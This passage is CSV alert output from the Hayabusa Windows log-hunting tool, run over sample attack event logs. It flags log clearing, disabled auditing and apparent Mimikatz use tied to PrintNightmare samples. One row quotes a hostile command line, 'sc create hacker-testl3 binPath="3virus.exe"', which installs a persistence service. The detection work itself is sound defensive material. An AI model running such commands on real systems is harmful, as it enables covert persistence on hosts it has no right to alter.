admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 
+09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy 
disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 